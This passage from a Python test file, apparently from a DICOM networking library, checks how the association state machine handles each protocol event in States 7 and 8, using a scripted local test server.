('send', a_associate_rj),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt4']
# The SCP received the A-ASSOCIATE-RQ, A-RELEASE-RQ, then the A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta7 + Evt5."""
# Sta7 + Evt5 -> <ignore> -> Sta7
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta7 + Evt6."""
# Sta7 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt6']
# The SCP received the A-ASSOCIATE-RQ, A-RELEASE-RQ, then the A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta7 + Evt7."""
# Sta7 + Evt7 -> <ignore> -> Sta7
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt7']
def test_evt08(self):
"""Test Sta7 + Evt8."""
# Sta7 + Evt8 -> <ignore> -> Sta7
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt8']
def test_evt09(self):
"""Test Sta7 + Evt9."""
# Sta7 + Evt9 -> <ignore> -> Sta7
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt9']
def test_evt10(self):
"""Test Sta7 + Evt10."""
# Sta7 + Evt10 -> AR-6 -> Sta7
# Evt10: Receive P-DATA-TF PDU from <remote>
# AR-6: Send P-DATA primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', p_data_tf),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
# primitive = self.assoc.dul.receive_pdu(wait=False)
# assert isinstance(primitive, P_DATA)
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt10', 'AR-6'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt10']
def test_evt11(self):
"""Test Sta7 + Evt11."""
# Sta7 + Evt11 -> <ignore> -> Sta7
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt11']
def test_evt12(self):
"""Test Sta7 + Evt12."""
# Sta7 + Evt12 -> AR-8 -> Sta9 or Sta10
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AR-8: Issue A-RELEASE (rq) - release collision
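# The local AE is the association requestor here, so the collision should
# leave it in Sta9; an acceptor ends up in Sta10 instead (see TestState10).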
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12']
def test_evt13(self):
"""Test Sta7 + Evt13."""
# Sta7 + Evt13 -> AR-3 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-3: Issue A-RELEASE (rp) primitive and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rp),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
primitive = self.assoc.dul.receive_pdu(wait=False)
assert isinstance(primitive, A_RELEASE)
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt13', 'AR-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt13']
def test_evt14(self):
"""Test Sta7 + Evt14."""
# Sta7 + Evt14 -> <ignore> -> Sta7
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt14']
def test_evt15(self):
"""Test Sta7 + Evt15."""
# Sta7 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt15', 'AA-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt15'
]
def test_evt16(self):
"""Test Sta7 + Evt16."""
# Sta7 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_abort),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt16']
def test_evt17(self):
"""Test Sta7 + Evt17."""
# Sta7 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt17']
def test_evt18(self):
"""Test Sta7 + Evt18."""
# Sta7 + Evt18 -> <ignore> -> Sta7
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt18']
def test_evt19(self):
"""Test Sta7 + Evt19."""
# Sta7 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt19']
# The SCP received the A-ASSOCIATE-RQ, A-RELEASE-RQ, then the A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState08(TestStateBase):
"""Tests for State 08: Awaiting A-RELEASE (rp) primitive."""
def move_to_state(self, assoc, scp):
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta6')
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta8')
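# Returning False from is_release_requested() stops the ACSE from answering
# the peer's A-RELEASE-RQ itself, so the DUL can sit in Sta8 waiting for a
# local A-RELEASE (rsp) primitive.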
def test_evt01(self):
"""Test Sta8 + Evt1."""
# Sta8 + Evt1 -> <ignore> -> Sta8
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta8 + Evt2."""
# Sta8 + Evt2 -> <ignore> -> Sta8
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta8 + Evt3."""
# Sta8 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt3']
def test_evt04(self):
"""Test Sta8 + Evt4."""
# Sta8 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('send', a_associate_rj),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta8 + Evt5."""
# Sta8 + Evt5 -> <ignore> -> Sta8
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta8 + Evt6."""
# Sta8 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt6']
def test_evt07(self):
"""Test Sta8 + Evt7."""
# Sta8 + Evt7 -> <ignore> -> Sta8
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt7']
def test_evt08(self):
"""Test Sta8 + Evt8."""
# Sta8 + Evt8 -> <ignore> -> Sta8
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt8']
def test_evt09(self):
"""Test Sta8 + Evt9."""
# Sta8 + Evt9 -> AR-7 -> Sta8
# Evt9: Receive P-DATA primitive from <local user>
# AR-7: Send P-DATA-TF PDU to <remote>
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt9']
def test_evt10(self):
"""Test Sta8 + Evt10."""
# Sta8 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('send', p_data_tf),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt10']
def test_evt11(self):
"""Test Sta8 + Evt11."""
# Sta8 + Evt11 -> <ignore> -> Sta8
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt11']
def test_evt12(self):
"""Test Sta8 + Evt12."""
# Sta8 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # get a_assoc_rq
('send', a_associate_ac),
('send', a_release_rq),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt12']
def test_evt13(self):
"""Test Sta8 + Evt13."""
# Sta8 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt13']
def test_evt14(self):
"""Test Sta8 + Evt14."""
# Sta8 + Evt14 -> AR-4 -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-4: Send A-RELEASE-RP PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt14']
def test_evt15(self):
"""Test Sta8 + Evt15."""
# Sta8 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt15', 'AA-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt15'
]
def test_evt16(self):
"""Test Sta8 + Evt16."""
# Sta8 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('send', a_abort),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt16']
def test_evt17(self):
"""Test Sta8 + Evt17."""
# Sta8 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt17']
def test_evt18(self):
"""Test Sta8 + Evt18."""
# Sta8 + Evt18 -> <ignore> -> Sta8
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt18']
def test_evt19(self):
"""Test Sta8 + Evt19."""
# Sta8 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('send', b'\x08\x00\x00\x00\x00\x00'),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt19']
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState09(TestStateBase):
"""Tests for State 09: Release collision req - awaiting A-RELEASE (rp)."""
def move_to_state(self, assoc, scp):
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
